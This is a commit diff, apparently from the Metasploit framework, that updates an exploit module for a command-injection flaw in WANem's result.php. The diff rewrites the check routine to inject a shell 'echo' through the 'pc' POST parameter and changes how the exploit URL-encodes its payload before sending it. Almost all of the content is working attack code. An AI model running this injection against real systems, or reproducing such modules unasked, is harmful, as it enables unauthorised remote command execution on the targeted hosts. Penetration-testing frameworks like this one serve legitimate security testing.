check function test vulnerability + minor improvements
parent
f02659184a
commit
37c7f366f2
|
@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
and vulnerable to command execution in argument one.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 1 $',
|
||||
'Privileged' => true,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
|
@ -42,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'BadChars' => "\x00\x22\x27",
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
|
@ -68,24 +67,35 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
|
||||
data = "pc=127.0.0.1; "
|
||||
data << Rex::Text.uri_encode("echo #{fingerprint}")
|
||||
data << "%26"
|
||||
print_status("#{@peer} - Sending check")
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/WANem/result.php'
|
||||
})
|
||||
if res and res.body =~ /<br><br><br><b><font color=red>Can't measure\!\! Please repeat\.<\/font><\/b><\/body>/
|
||||
return Exploit::CheckCode::Appears
|
||||
'uri' => '/WANem/result.php',
|
||||
'method' => 'POST',
|
||||
'data' => data
|
||||
}, 25)
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res and res.code == 200 and res.body =~ /#{fingerprint}/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
data = "pc=127.0.0.1; "
|
||||
data << URI.encode(payload.raw)
|
||||
data << Rex::Text.uri_encode(payload.raw)
|
||||
data << "%26"
|
||||
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
|
||||
begin
|
||||
|
|
Loading…
Reference in New Issue